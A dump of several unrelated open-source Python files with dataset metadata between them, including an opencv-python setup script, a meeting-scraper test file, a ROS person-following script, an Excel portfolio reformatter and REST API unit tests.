rearrange_cmake_output_data, files_outside_package_dir, package_data.keys()
)
skbuild.setup(
name=package_name,
version=package_version,
url="https://github.com/GArik/opencv-python",
license="MIT",
description="Wrapper package for OpenCV python bindings.",
long_description=long_description,
long_description_content_type="text/markdown",
packages=packages,
package_data=package_data,
maintainer="Igor Murzov",
ext_modules=EmptyListWithLength(),
install_requires=numpy_version,
python_requires=">=3.6",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Intended Audience :: Information Technology",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows",
"Operating System :: POSIX",
"Operating System :: Unix",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: C++",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Image Recognition",
"Topic :: Software Development",
],
cmake_args=cmake_args,
cmake_source_dir=cmake_source_dir,
)
class RearrangeCMakeOutput(object):
"""
Patch SKBuild logic to only take files related to the Python package
and construct a file hierarchy that SKBuild expects (see below)
"""
_setuptools_wrap = None
# Have to wrap a function reference, or it's converted
# into an instance method on attr assignment
import argparse
wraps = argparse.Namespace(_classify_installed_files=None)
del argparse
package_paths_re = None
packages = None
files_outside_package = None
def __init__(self, package_paths_re, files_outside_package, packages):
cls = self.__class__
assert not cls.wraps._classify_installed_files, "Singleton object"
import skbuild.setuptools_wrap
cls._setuptools_wrap = skbuild.setuptools_wrap
cls.wraps._classify_installed_files = (
cls._setuptools_wrap._classify_installed_files
)
cls._setuptools_wrap._classify_installed_files = (
self._classify_installed_files_override
)
cls.package_paths_re = package_paths_re
cls.files_outside_package = files_outside_package
cls.packages = packages
def __del__(self):
cls = self.__class__
cls._setuptools_wrap._classify_installed_files = (
cls.wraps._classify_installed_files
)
cls.wraps._classify_installed_files = None
cls._setuptools_wrap = None
def _classify_installed_files_override(
self,
install_paths,
package_data,
package_prefixes,
py_modules,
new_py_modules,
scripts,
new_scripts,
data_files,
cmake_source_dir,
cmake_install_reldir,
):
"""
From all CMake output, we're only interested in a few files
and must place them into CMake install dir according
to Python conventions for SKBuild to find them:
package\
file
subpackage\
etc.
"""
cls = self.__class__
# 'relpath'/'reldir' = relative to CMAKE_INSTALL_DIR/cmake_install_dir
# 'path'/'dir' = relative to sourcetree root
cmake_install_dir = os.path.join(
cls._setuptools_wrap.CMAKE_INSTALL_DIR(), cmake_install_reldir
)
install_relpaths = [
os.path.relpath(p, cmake_install_dir) for p in install_paths
]
fslash_install_relpaths = [
p.replace(os.path.sep, "/") for p in install_relpaths
]
relpaths_zip = list(zip(fslash_install_relpaths, install_relpaths))
del install_relpaths, fslash_install_relpaths
final_install_relpaths = []
print("Copying files from CMake output")
for package_name, relpaths_re in cls.package_paths_re.items():
package_dest_reldir = package_name.replace(".", os.path.sep)
for relpath_re in relpaths_re:
found = False
r = re.compile(relpath_re + "$")
for fslash_relpath, relpath in relpaths_zip:
m = r.match(fslash_relpath)
if not m:
continue
found = True
new_install_relpath = os.path.join(
package_dest_reldir, os.path.basename(relpath)
)
cls._setuptools_wrap._copy_file(
os.path.join(cmake_install_dir, relpath),
os.path.join(cmake_install_dir, new_install_relpath),
hide_listing=False,
)
final_install_relpaths.append(new_install_relpath)
del m, fslash_relpath, new_install_relpath
else:
if not found:
raise Exception("Not found: '%s'" % relpath_re)
del r, found
del relpaths_zip
print("Copying files from non-default sourcetree locations")
for package_name, paths in cls.files_outside_package.items():
package_dest_reldir = package_name.replace(".", os.path.sep)
for path in paths:
new_install_relpath = os.path.join(
package_dest_reldir,
# Don't yet have a need to copy
# to subdirectories of package dir
os.path.basename(path),
)
cls._setuptools_wrap._copy_file(
path,
os.path.join(cmake_install_dir, new_install_relpath),
hide_listing=False,
)
final_install_relpaths.append(new_install_relpath)
final_install_paths = [
os.path.join(cmake_install_dir, p) for p in final_install_relpaths
]
return (cls.wraps._classify_installed_files)(
final_install_paths,
package_data,
package_prefixes,
py_modules,
new_py_modules,
scripts,
new_scripts,
data_files,
# To get around a check that prepends source dir to paths and breaks package detection code.
cmake_source_dir="",
cmake_install_dir=cmake_install_reldir,
)
def get_and_set_info(contrib, headless, ci_build):
# cv2/version.py should be generated by running find_version.py
version = {}
here = os.path.abspath(os.path.dirname(__file__))
version_file = os.path.join(here, "cv2", "version.py")
# generate a fresh version.py always when Git repository exists
# (in sdists the version.py file already exists)
if os.path.exists(".git"):
old_args = sys.argv.copy()
sys.argv = ["", str(contrib), str(headless), str(ci_build)]
runpy.run_path("find_version.py", run_name="__main__")
sys.argv = old_args
with open(version_file) as fp:
exec(fp.read(), version)
return version["opencv_version"], version["contrib"], version["headless"]
def get_build_env_var_by_name(flag_name):
flag_set = False
try:
flag_set = bool(int(os.getenv("ENABLE_" + flag_name.upper(), None)))
except Exception:
pass
if not flag_set:
try:
flag_set = bool(int(open(flag_name + ".enabled").read(1)))
except Exception:
pass
return flag_set
# This creates a list which is empty but returns a length of 1.
# Should make the wheel a binary distribution and platlib compliant.
class EmptyListWithLength(list):
def __len__(self):
return 1
if __name__ == "__main__":
main()
| 35.68559
| 125
| 0.596427
|
ec576e197844f7c2320e2b6563d77fd1569e417b
| 2,298
|
py
|
Python
|
tests/test_chi_ssa_1.py
|
zarifmahmud/city-scrapers
|
52d6056001c8ea5e100dd686c52947836d63aff9
|
[
"MIT"
] | null | null | null |
tests/test_chi_ssa_1.py
|
zarifmahmud/city-scrapers
|
52d6056001c8ea5e100dd686c52947836d63aff9
|
[
"MIT"
] | null | null | null |
tests/test_chi_ssa_1.py
|
zarifmahmud/city-scrapers
|
52d6056001c8ea5e100dd686c52947836d63aff9
|
[
"MIT"
] | null | null | null |
from datetime import date, time
import pytest
from freezegun import freeze_time
from tests.utils import file_response
from city_scrapers.constants import COMMISSION, CONFIRMED, PASSED, TENTATIVE
from city_scrapers.spiders.chi_ssa_1 import ChiSsa1Spider
test_response = file_response('files/chi_ssa_1.html')
spider = ChiSsa1Spider()
freezer = freeze_time('2018-10-12 12:00:00')
freezer.start()
parsed_items = [item for item in spider.parse(test_response) if isinstance(item, dict)]
freezer.stop()
def test_start():
assert parsed_items[0]['start'] == {'date': date(2018, 1, 16), 'time': time(14, 0), 'note': ''}
def test_id():
assert parsed_items[0]['id'] == ('chi_ssa_1/201801161400/x/state_street_commission')
def test_status():
assert parsed_items[0]['status'] == PASSED
assert parsed_items[5]['status'] == CONFIRMED
assert parsed_items[-1]['status'] == TENTATIVE
def test_documents():
assert parsed_items[0]['documents'] == [{
'url':
'https://loopchicago.com/assets/State-Street-Commission-Meeting-Minutes/da3d4977e1/2018-january-16-ssc-meeting-minutes.pdf', # noqa
'note': 'Minutes',
}]
assert parsed_items[-1]['documents'] == []
@pytest.mark.parametrize('item', parsed_items)
def test_name(item):
assert item['name'] == 'State Street Commission'
@pytest.mark.parametrize('item', parsed_items)
def test_description(item):
assert item['event_description'] == ''
@pytest.mark.parametrize('item', parsed_items)
def test_end(item):
assert item['end']['date'] == item['start']['date']
assert item['end']['time'] is None
@pytest.mark.parametrize('item', parsed_items)
def test_all_day(item):
assert item['all_day'] is False
@pytest.mark.parametrize('item', parsed_items)
def test_location(item):
assert item['location'] == {
'address': '190 N State St Chicago, IL 60601',
'name': 'ABC 7 Chicago',
'neighborhood': '',
}
@pytest.mark.parametrize('item', parsed_items)
def test_classification(item):
assert item['classification'] == COMMISSION
@pytest.mark.parametrize('item', parsed_items)
def test_sources(item):
assert len(item['sources']) == 1
@pytest.mark.parametrize('item', parsed_items)
def test__type(item):
assert item['_type'] == 'event'
| 26.413793
| 144
| 0.695387
|
8fcde5aa01b53c0a475451d3b45264a00c1c9f47
| 1,332
|
py
|
Python
|
deli_menu/http/mounts/root/routes/metadata.py
|
sandwichcloud/deli-menu
|
ca7a3a88b71188124dc174e810c17e8b19a320b4
|
[
"MIT"
] | null | null | null |
deli_menu/http/mounts/root/routes/metadata.py
|
sandwichcloud/deli-menu
|
ca7a3a88b71188124dc174e810c17e8b19a320b4
|
[
"MIT"
] | null | null | null |
deli_menu/http/mounts/root/routes/metadata.py
|
sandwichcloud/deli-menu
|
ca7a3a88b71188124dc174e810c17e8b19a320b4
|
[
"MIT"
] | null | null | null |
import cherrypy
from ingredients_db.models.instance import Instance
from ingredients_db.models.region import Region
from ingredients_db.models.zones import Zone
from ingredients_http.route import Route
from ingredients_http.router import Router
class MetaDataRouter(Router):
def __init__(self):
super().__init__(uri_base='meta-data')
@Route()
@cherrypy.tools.json_out()
def get(self):
with cherrypy.request.db_session() as session:
instance = session.query(Instance).filter(Instance.id == cherrypy.request.instance_id).first()
region = session.query(Region).filter(Region.id == instance.region_id).first()
zone = session.query(Zone).filter(Zone.id == instance.zone_id).first()
keypairs = []
for keypair in instance.keypairs:
keypairs.append(keypair.public_key)
# Strip out user-data
tags = instance.tags if instance.tags is not None else {}
if 'user-data' in tags:
del tags['user-data']
metadata = {
'ami-id': instance.image_id,
'instance-id': instance.id,
'region': region.name,
'availability-zone': zone.name,
'tags': tags,
'public-keys': keypairs
}
return metadata
| 32.487805
| 106
| 0.623874
|
d4f109f265a9ef80d103ea28f7cb435d0da19e52
| 220
|
py
|
Python
|
mirumon/main.py
|
mirumon/mirumon-backend
|
9b4d914b67dcc839ed8264f470e822dc22c98ad7
|
[
"MIT"
] | 19
|
2020-01-25T22:52:09.000Z
|
2022-03-20T13:45:10.000Z
|
mirumon/main.py
|
mirumon/mirumon-backend
|
9b4d914b67dcc839ed8264f470e822dc22c98ad7
|
[
"MIT"
] | 15
|
2019-10-07T18:18:40.000Z
|
2020-10-17T15:47:39.000Z
|
mirumon/main.py
|
mirumon/mirumon-backend
|
9b4d914b67dcc839ed8264f470e822dc22c98ad7
|
[
"MIT"
] | 1
|
2020-01-20T14:16:29.000Z
|
2020-01-20T14:16:29.000Z
|
import uvicorn
from mirumon.api.asgi import create_app
from mirumon.settings.config import get_app_settings
settings = get_app_settings()
app = create_app(settings)
if __name__ == "__main__":
uvicorn.run(app=app)
| 20
| 52
| 0.786364
|
a5430cf8e3823cb1bf637dca2a204efd8777c749
| 5,568
|
py
|
Python
|
modifiers.py
|
mglac/S2C-excel-modifier-for-trading
|
03237c14cf60c715a43607cb53f33314674524d1
|
[
"MIT"
] | null | null | null |
modifiers.py
|
mglac/S2C-excel-modifier-for-trading
|
03237c14cf60c715a43607cb53f33314674524d1
|
[
"MIT"
] | null | null | null |
modifiers.py
|
mglac/S2C-excel-modifier-for-trading
|
03237c14cf60c715a43607cb53f33314674524d1
|
[
"MIT"
] | null | null | null |
# modifiers.py - This class contains the methods used to alter the portfolio
# spreadsheets to the desired format for trading assets.
import os
from openpyxl import styles
from openpyxl import load_workbook
from openpyxl import Workbook
from tkinter import filedialog
from tkinter import Text
# excel_modifications Method
# This method takes the file path to the workbook being read along with the
# file path to the location the user wants the new workbooks to be stored at.
def excel_modifications(file_path, storage_path):
init_wb = load_workbook(file_path, data_only=True) # loads workbook
for ws in init_wb:
if ws.title == "CORE":
# checks if the current worksheet is the CORE worksheet
core_compression(ws, storage_path)
if ws.title == "Infl":
# checks if the current worksheet is the Infl worksheet
infl_compression(ws, storage_path)
if ws.title == "FI" or ws.sheet_properties.tabColor.theme == 9:
# checks if the current worksheet is the FI worksheet or if the
# current worksheet's tab number is colored green
common_compression(ws, storage_path)
# common_compression method
# This method is used to modify any portfolio worksheet along with the Fixed
# Income worksheet. This is done to prepare the worksheet for trading.
def common_compression(worksheet, storage_path):
new_wb = Workbook() # creates a new workbook to write to
new_ws = new_wb.active # opens to the active worksheet in the new workbook
new_ws.title = worksheet.title + ".xlsx" # creates the new workbook title
new_ws_ticker_list = [] # a list of tickers
new_ws_percent_list = [] # a list of percents corresponding to tickers
for row in worksheet.values: # Iterates through all of the rows in the ws
curr_percent = row[0]
curr_ticker = row[1]
if isinstance(curr_percent, float) and isinstance(curr_ticker, str):
new_ws_ticker_list.append(str(curr_ticker))
new_ws_percent_list.append(curr_percent)
for i in range(len(new_ws_ticker_list) + 1):
if i == 0:
# Titles the column as Security
new_ws.cell(1, 1).value = 'Security'
new_ws.cell(1, 2).value = '%' # Titles the column as %
else:
new_ws.cell(i+1, 1).value = new_ws_ticker_list[i-1]
new_ws.cell(i+1, 2).value = new_ws_percent_list[i-1]
new_ws.cell(i+1, 1).number_format = '0.000%'
new_ws.cell(i+1, 2).number_format = '0.000%'
# Saves in specified file location
new_wb.save(storage_path + "\\" + str(new_ws.title))
# core_compression method
# This method is used to modify the Core Stocks worksheet. This is done to
# prepare the worksheet for trading.
def core_compression(worksheet, storage_path):
new_wb = Workbook() # creates a new workbook to write to
new_ws = new_wb.active # opens to the active worksheet in the new workbook
new_ws.title = worksheet.title + ".xlsx" # creates the new workbook title
new_ws_ticker_list = [] # a list of tickers
new_ws_percent_list = [] # a list of percents corresponding to tickers
for row in worksheet.values: # Iterates through all of the rows in the ws
curr_percent = row[3]
curr_ticker = row[0]
if isinstance(curr_percent, float) and isinstance(curr_ticker, str):
new_ws_ticker_list.append(str(curr_ticker))
new_ws_percent_list.append(curr_percent)
for i in range(len(new_ws_ticker_list) + 1):
if i == 0:
# Titles the column as Security
new_ws.cell(1, 1).value = 'Security'
new_ws.cell(1, 2).value = '%' # Titles the column as %
else:
new_ws.cell(i+1, 1).value = new_ws_ticker_list[i-1]
new_ws.cell(i+1, 2).value = new_ws_percent_list[i-1]
new_ws.cell(i+1, 1).number_format = '0.000%'
new_ws.cell(i+1, 2).number_format = '0.000%'
# Saves in specified file location
new_wb.save(storage_path + "\\" + str(new_ws.title))
# infl_compression method
# This method is used to modify the Inflation Model worksheet. This is done to
# prepare the worksheet for trading.
def infl_compression(worksheet, storage_path):
new_wb = Workbook() # creates a new workbook to write to
new_ws = new_wb.active # opens to the active worksheet in the new workbook
new_ws.title = worksheet.title + ".xlsx" # creates the new workbook title
new_ws_ticker_list = [] # a list of tickers
new_ws_percent_list = [] # a list of percents corresponding to tickers
for row in worksheet.values: # Iterates through all of the rows in the ws
curr_percent = row[2]
curr_ticker = row[0]
if isinstance(curr_percent, float) and isinstance(curr_ticker, str):
new_ws_ticker_list.append(str(curr_ticker))
new_ws_percent_list.append(curr_percent)
for i in range(len(new_ws_ticker_list) + 1):
if i == 0:
# Titles the column as Security
new_ws.cell(1, 1).value = 'Security'
new_ws.cell(1, 2).value = '%' # Titles the column as %
else:
new_ws.cell(i+1, 1).value = new_ws_ticker_list[i-1]
new_ws.cell(i+1, 2).value = new_ws_percent_list[i-1]
new_ws.cell(i+1, 1).number_format = '0.000%'
new_ws.cell(i+1, 2).number_format = '0.000%'
# Saves in specified file location
new_wb.save(storage_path + "\\" + str(new_ws.title))
| 45.639344
| 79
| 0.663973
|
ccd22d7f32a2c08ed895a76d5482386df233260a
| 5,693
|
py
|
Python
|
person_tracking/scripts/real_time_object_detection.py
|
CARMinesDouai/2020-RobotGuide-Freight
|
123f4ba42f09b36038b519c69fc42208478408f2
|
[
"MIT"
] | null | null | null |
person_tracking/scripts/real_time_object_detection.py
|
CARMinesDouai/2020-RobotGuide-Freight
|
123f4ba42f09b36038b519c69fc42208478408f2
|
[
"MIT"
] | null | null | null |
person_tracking/scripts/real_time_object_detection.py
|
CARMinesDouai/2020-RobotGuide-Freight
|
123f4ba42f09b36038b519c69fc42208478408f2
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# USAGE
# python real_time_object_detection.py --prototxt MobileNetSSD_deploy.prototxt.txt --model MobileNetSSD_deploy.caffemodel
# import the necessary packages
from imutils.video import VideoStream
from imutils.video import FPS
from geometry_msgs.msg import Twist
from sensor_msgs.msg import LaserScan
import numpy as np
import argparse
import imutils
import time
import cv2
import rospy
startX=0
startY=0
endX=0
endY=0
start_robot=0
max_size_X=0
max_size_Y=0
mean_dist_right=0
mean_dist_left=0
last_startX=0
last_endX=0
obstacle_detected=1
person_lost=0
idx=0
vel_msg=Twist()
# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--prototxt", required=True,
help="path to Caffe 'deploy' prototxt file")
ap.add_argument("-m", "--model", required=True,
help="path to Caffe pre-trained model")
ap.add_argument("-c", "--confidence", type=float, default=0.2,
help="minimum probability to filter weak detections")
args = vars(ap.parse_args())
# initialize the list of class labels MobileNet SSD was trained to
# detect, then generate a set of bounding box colors for each class
CLASSES = ["background", "aeroplane", "bicycle", "bird", "boat",
"bottle", "bus", "car", "cat", "chair", "cow", "diningtable",
"dog", "horse", "motorbike", "person", "pottedplant", "sheep",
"sofa", "train", "tvmonitor"]
COLORS = np.random.uniform(0, 255, size=(len(CLASSES), 3))
# load our serialized model from disk
print("[INFO] loading model...")
net = cv2.dnn.readNetFromCaffe(args["prototxt"], args["model"])
# initialize the video stream, allow the cammera sensor to warmup,
# and initialize the FPS counter
print("[INFO] starting video stream...")
vs = VideoStream(src=3).start()
time.sleep(2.0)
fps = FPS().start()
def move_robot(obstacle_detected,person_lost):
global vel_msg
global startX
global startY
global endX
global endY
global last_endX
global last_startX
global vel_msg
if person_lost==0:
vel_msg.angular.z=-obstacle_detected*(((startX+endX)/400)-1)*1.2
vel_msg.linear.x=((startY/8)-1)/30
elif person_lost==1:
vel_msg.angular.z=0.3
vel_msg.linear.x=0.1
else:
vel_msg.angular.z=-0.3
vel_msg.linear.x=0.1
if vel_msg.linear.x>0.4:
vel_msg.linear.x=0.4
_cmd_pub.publish(vel_msg)
if startX!=0 and endX!=0:
last_endX=endX
last_startX=startX
return last_endX,last_startX
def laser_detection(data):
Lengths = len(data.ranges)
total_range_left=0.0
total_range_right=0.0
mean_dist_right=0.0
mean_dist_left=0.0
global obstacle_detected
global vel_msg
for i in range(0,242):
if data.ranges[i]<0.5:
total_range_right+=data.ranges[i]
for i in range(484,726):
if data.ranges[i]<0.5:
total_range_left+=data.ranges[i]
mean_dist_left=total_range_left/242
mean_dist_right=total_range_right/242
if (mean_dist_right>0.01 and mean_dist_right<0.16) or (mean_dist_left>0.01 and mean_dist_left<0.16) and vel_msg.angular.z>0.1 :
obstacle_detected=0
else:
obstacle_detected=1
return obstacle_detected
def person_recognition():
global startX
global startY
global endX
global endY
global idx
global person_lost
global start_robot
# grab the frame from the threaded video stream and resize it
# to have a maximum width of 400 pixels
frame = vs.read()
frame = imutils.resize(frame, width=400)
# grab the frame dimensions and convert it to a blob
(h, w) = frame.shape[:2]
blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)),
0.007843, (300, 300), 127.5)
# pass the blob through the network and obtain the detections and
# predictions
net.setInput(blob)
detections = net.forward()
if last_endX<200 and last_startX<50 and idx==0 and start_robot==1:
person_lost=1
move_robot(obstacle_detected,person_lost)
elif last_endX>350 and last_startX>200 and idx==0 and start_robot==1:
person_lost=2
move_robot(obstacle_detected,person_lost)
else:
print("depart")
# loop over the detections
for i in np.arange(0, detections.shape[2]):
# extract the confidence (i.e., probability) associated with
# the prediction
confidence = detections[0, 0, i, 2]
# filter out weak detections by ensuring the `confidence` is
# greater than the minimum confidence
if confidence > args["confidence"]:
# extract the index of the class label from the
# `detections`, then compute the (x, y)-coordinates of
# the bounding box for the object
idx = int(detections[0, 0, i, 1])
#idx15 is the index of the person
if idx==15:
start_robot=1
person_lost=0
move_robot(obstacle_detected,person_lost)
box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])
(startX, startY, endX, endY) = box.astype("int")
# draw the prediction on the frame
label = "{}: {:.2f}%".format(CLASSES[idx],
confidence * 100)
cv2.rectangle(frame, (startX, startY), (endX, endY),
COLORS[idx], 2)
y = startY - 15 if startY - 15 > 15 else startY + 15
cv2.putText(frame, label, (startX, y),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[idx], 2)
else:
idx=0
# show the output frame
cv2.imshow("Frame", frame)
# update the FPS counter
fps.update()
if __name__ == '__main__':
rospy.init_node('person_tracking', anonymous=True)
_cmd_pub = rospy.Publisher('/cmd_vel_mux/input/navi', Twist, queue_size=1)
rospy.Subscriber('/scan', LaserScan, laser_detection)
while True:
person_recognition()
print("startx="+str(startX))
print("endx="+str(endX))
print("person_lost="+str(person_lost))
print("idx="+str(idx))
print("vitesse="+str(vel_msg.linear.x))
print("angulaire="+str(vel_msg.angular.z))
key = cv2.waitKey(1) & 0xFF
if key == ord("q"):
fps.stop()
cv2.destroyAllWindows()
vs.stop()
| 29.045918
| 128
| 0.724925
|
323632b51b01039d6884d39eef1288ccbe680a73
| 916
|
py
|
Python
|
_draft/x_6_9_c.py
|
ofl/kuku2
|
7247fb1862d917d23258ebe7a93dca5939433225
|
[
"MIT"
] | null | null | null |
_draft/x_6_9_c.py
|
ofl/kuku2
|
7247fb1862d917d23258ebe7a93dca5939433225
|
[
"MIT"
] | 1
|
2021-11-13T08:03:04.000Z
|
2021-11-13T08:03:04.000Z
|
_draft/x_6_9_c.py
|
ofl/kuku2
|
7247fb1862d917d23258ebe7a93dca5939433225
|
[
"MIT"
] | null | null | null |
# x_6_9
#
#
class CardErorr(Exception):
pass
class StoreErorr(Exception):
pass
class StockError(StoreErorr):
pass
class ZipcodeError(StoreErorr):
pass
class ExpiredError(CardErorr):
pass
class NumberError(CardErorr):
pass
order_count = input('きび団子を何個注文しますか?:')
zipcode = input('郵便番号を入力してください:')
card_number = input('カード番号を入力してください?(例、0000-0000-0000-0000):')
expired_at = input('有効期限を入力してください(例、2022-03):')
try:
if int(order_count) > 100:
raise StockError
if card_number != '1111-1111-1111-1111':
raise NumberError
if expired_at != '2025-03':
raise ExpiredError
print('ご購入ありがとうございます')
except StoreErorr:
print('在庫切れです')
except CardErorr as e:
print('決済でエラーが発生しました')
if isinstance(e, ExpiredError):
print('有効期限が違います')
elif isinstance(e, NumberError):
print('カード番号が違います')
finally:
print('またのご利用お待ちしています')
| 17.615385
| 62
| 0.675764
|
f6c1886cb58f26bd7f951bc947a23fce51e311ba
| 10,282
|
py
|
Python
|
exercises/rest-api/rest_api_test.py
|
Grociu/fork-of-exercism-python
|
8aed8612117d5f9fa9db56a2b4bdc6143f6e15fd
|
[
"MIT"
] | 41
|
2015-02-09T18:08:45.000Z
|
2022-03-06T15:23:32.000Z
|
exercises/rest-api/rest_api_test.py
|
Grociu/fork-of-exercism-python
|
8aed8612117d5f9fa9db56a2b4bdc6143f6e15fd
|
[
"MIT"
] | 21
|
2019-12-28T17:47:06.000Z
|
2021-02-27T19:43:00.000Z
|
exercises/rest-api/rest_api_test.py
|
Grociu/fork-of-exercism-python
|
8aed8612117d5f9fa9db56a2b4bdc6143f6e15fd
|
[
"MIT"
] | 18
|
2016-04-29T14:35:12.000Z
|
2021-06-23T07:32:29.000Z
|
import unittest
import json
from rest_api import RestAPI
# Tests adapted from `problem-specifications//canonical-data.json` @ v1.1.1
class RestAPITest(unittest.TestCase):
def test_no_users(self):
database = {"users": []}
api = RestAPI(database)
response = api.get('/users')
self.assertDictEqual(json.loads(response), database)
def test_add_user(self):
database = {"users": []}
api = RestAPI(database)
payload = json.dumps({
'user': 'Adam'
})
response = api.post('/add', payload)
expected = {
'name': 'Adam',
'owes': {},
'owed_by': {},
'balance': 0
}
self.assertDictEqual(json.loads(response), expected)
def test_get_single_user(self):
database = {
'users': [
{
'name': 'Adam',
'owes': {},
'owed_by': {},
'balance': 0
},
{
'name': 'Bob',
'owes': {},
'owed_by': {},
'balance': 0
}
]
}
api = RestAPI(database)
payload = json.dumps({
'users': ['Bob']
})
response = api.get('/users', payload)
expected = {
'users': [
{
'name': 'Bob',
'owes': {},
'owed_by': {},
'balance': 0
}
]
}
self.assertDictEqual(json.loads(response), expected)
def test_iou_both_users_have_0_balance(self):
database = {
'users': [
{
'name': 'Adam',
'owes': {},
'owed_by': {},
'balance': 0
},
{
'name': 'Bob',
'owes': {},
'owed_by': {},
'balance': 0
}
]
}
api = RestAPI(database)
payload = json.dumps({
'lender': 'Adam',
'borrower': 'Bob',
'amount': 3
})
response = api.post('/iou', payload)
expected = {
'users': [
{
'name': 'Adam',
'owes': {},
'owed_by': {
'Bob': 3
},
'balance': 3
},
{
'name': 'Bob',
'owes': {
'Adam': 3
},
'owed_by': {},
'balance': -3
}
]
}
self.assertDictEqual(json.loads(response), expected)
def test_borrower_has_negative_balance(self):
database = {
'users': [
{
'name': 'Adam',
'owes': {},
'owed_by': {},
'balance': 0
},
{
'name': 'Bob',
'owes': {
'Chuck': 3
},
'owed_by': {},
'balance': -3
},
{
'name': 'Chuck',
'owes': {},
'owed_by': {
'Bob': 3
},
'balance': 3
}
]
}
api = RestAPI(database)
payload = json.dumps({
'lender': 'Adam',
'borrower': 'Bob',
'amount': 3
})
response = api.post('/iou', payload)
expected = {
'users': [
{
'name': 'Adam',
'owes': {},
'owed_by': {
'Bob': 3
},
'balance': 3
},
{
'name': 'Bob',
'owes': {
'Adam': 3,
'Chuck': 3
},
'owed_by': {},
'balance': -6
}
]
}
self.assertDictEqual(json.loads(response), expected)
def test_lender_has_negative_balance(self):
database = {
'users': [
{
'name': 'Adam',
'owes': {},
'owed_by': {},
'balance': 0
},
{
'name': 'Bob',
'owes': {
'Chuck': 3
},
'owed_by': {},
'balance': -3
},
{
'name': 'Chuck',
'owes': {},
'owed_by': {
'Bob': 3
},
'balance': 3
}
]
}
api = RestAPI(database)
payload = json.dumps({
'lender': 'Bob',
'borrower': 'Adam',
'amount': 3
})
response = api.post('/iou', payload)
expected = {
'users': [
{
'name': 'Adam',
'owes': {
'Bob': 3
},
'owed_by': {},
'balance': -3
},
{
'name': 'Bob',
'owes': {
'Chuck': 3
},
'owed_by': {
'Adam': 3
},
'balance': 0
}
]
}
self.assertDictEqual(json.loads(response), expected)
def test_lender_owes_borrower(self):
database = {
"users": [
{
"name": "Adam",
"owes": {
"Bob": 3.0
},
"owed_by": {},
"balance": -3.0
},
{
"name": "Bob",
"owes": {},
"owed_by": {
"Adam": 3.0
},
"balance": 3.0
}
]
}
api = RestAPI(database)
payload = json.dumps({
'lender': 'Adam',
'borrower': 'Bob',
'amount': 2
})
response = api.post('/iou', payload)
expected = {
'users': [
{
"name": "Adam",
"owes": {
"Bob": 1.0
},
"owed_by": {},
"balance": -1.0
},
{
"name": "Bob",
"owes": {},
"owed_by": {
"Adam": 1.0
},
"balance": 1.0
}
]
}
self.assertDictEqual(json.loads(response), expected)
def test_lender_owes_borrower_less_than_new_loan(self):
database = {
"users": [
{
"name": "Adam",
"owes": {
"Bob": 3.0
},
"owed_by": {},
"balance": -3.0
},
{
"name": "Bob",
"owes": {},
"owed_by": {
"Adam": 3.0
},
"balance": 3.0
}
]
}
api = RestAPI(database)
payload = json.dumps({
'lender': 'Adam',
'borrower': 'Bob',
'amount': 4.0
})
response = api.post('/iou', payload)
expected = {
'users': [
{
"name": "Adam",
"owes": {
},
"owed_by": {
"Bob": 1.0
},
"balance": 1.0
},
{
"name": "Bob",
"owes": {
"Adam": 1.0
},
"owed_by": {
},
"balance": -1.0
}
]
}
self.assertDictEqual(json.loads(response), expected)
def test_lender_owes_borrower_same_as_new_loan(self):
database = {
"users": [
{
"name": "Adam",
"owes": {
"Bob": 3.0
},
"owed_by": {},
"balance": -3.0
},
{
"name": "Bob",
"owes": {},
"owed_by": {
"Adam": 3.0
},
"balance": 3.0
}
]
}
api = RestAPI(database)
payload = json.dumps({
'lender': 'Adam',
'borrower': 'Bob',
'amount': 3.0
})
response = api.post('/iou', payload)
expected = {
'users': [
{
"name": "Adam",
"owes": {
},
"owed_by": {
},
"balance": 0.0
},
{
"name": "Bob",
"owes": {
},
"owed_by": {
},
"balance": 0.0
}
]
}
self.assertDictEqual(json.loads(response), expected)
if __name__ == '__main__':
unittest.main()
| 26.986877
| 75
| 0.264637
|
67bfa4eeb220f01ba271e8a17610d6b2b82caa27
| 8,036
|
py
|
Python
|
noxfile.py
|
cojenco/python-storage
|
79b669bbede1cd4f06f1d697b71c7f9f2442fb80
|
[
"Apache-2.0"
] | null | null | null |
noxfile.py
|
cojenco/python-storage
|
79b669bbede1cd4f06f1d697b71c7f9f2442fb80
|
[
"Apache-2.0"
] | null | null | null |
noxfile.py
|
cojenco/python-storage
|
79b669bbede1cd4f06f1d697b71c7f9f2442fb80
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Generated by synthtool. DO NOT EDIT!
from __future__ import absolute_import
import os
import pathlib
import shutil
import nox
BLACK_VERSION = "black==19.10b0"
BLACK_PATHS = ["docs", "google", "tests", "noxfile.py", "setup.py"]
DEFAULT_PYTHON_VERSION = "3.8"
SYSTEM_TEST_PYTHON_VERSIONS = ["2.7", "3.8"]
UNIT_TEST_PYTHON_VERSIONS = ["2.7", "3.6", "3.7", "3.8", "3.9", "3.10"]
CONFORMANCE_TEST_PYTHON_VERSIONS = ["3.8"]
_DEFAULT_STORAGE_HOST = "https://storage.googleapis.com"
CURRENT_DIRECTORY = pathlib.Path(__file__).parent.absolute()
@nox.session(python=DEFAULT_PYTHON_VERSION)
def lint(session):
"""Run linters.
Returns a failure if the linters find linting errors or sufficiently
serious code quality issues.
"""
